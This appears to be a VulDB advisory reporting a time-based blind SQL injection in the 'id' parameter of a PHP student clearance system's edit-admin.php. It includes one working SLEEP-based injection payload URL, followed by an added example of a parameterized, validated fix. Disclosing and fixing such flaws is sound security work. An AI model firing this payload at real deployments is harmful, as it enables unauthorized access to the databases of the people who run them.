Title | Web-Based Student Clearance System is vulnerable to a SQL Injection (edit-admin.php) |
---|
Description | Web-Based Student Clearance System is vulnerable to a SQL Injection (edit-admin.php)
URL: /Admin/edit-admin.php
URI parameter 'id' is vulnerable
Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
Payload:
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP
Download Code: https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html |
---|
Source | ⚠️ https://blog.csdn.net/qq_41988749/article/details/127552717?spm=1001.2014.3001.5502 |
---|
User | jinyadong (ID 34634) |
---|
Submission | 10/27/2022 09:17 (2 years ago) |
---|
Moderation | 10/28/2022 07:32 (22 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 212415 |
---|
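
A parameterized version of the kind of lookup the report flags, as an added example that is not the application's own code: the `id` value is validated as an integer and bound as a parameter, so a quoted value like the payload above can no longer change the statement. The connection settings, the `admin_accounts` table and its columns are hypothetical.

```php
<?php
// Added example: hardened lookup for an edit-admin.php-style page.
// Assumptions (not taken from the application's source): the credentials,
// database name, table `admin_accounts` and its columns are hypothetical.

// Make mysqli throw exceptions instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function load_admin(mysqli $db, $rawId): ?array
{
    // 1. Accept only a positive integer. A value such as "5' AND ..." fails
    //    validation here and never reaches the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bind the value as a typed parameter. The statement text is fixed,
    //    so input cannot alter its structure even if step 1 were removed.
    $stmt = $db->prepare('SELECT id, username, email FROM admin_accounts WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// For comparison, the string-built pattern the report describes looks like:
//   $sql = "SELECT ... WHERE id = '" . $_GET['id'] . "'";   // untrusted input in the query text

// Placeholder connection settings; use a low-privilege database account.
$db = new mysqli('127.0.0.1', 'app_user', 'app_password', 'clearance_db');
$db->set_charset('utf8mb4');

$admin = load_admin($db, $_GET['id'] ?? null);
if ($admin === null) {
    http_response_code(400);
    exit('Invalid or unknown id');
}

// Encode on output so stored values are not interpreted as markup.
echo htmlspecialchars($admin['username'], ENT_QUOTES, 'UTF-8');
```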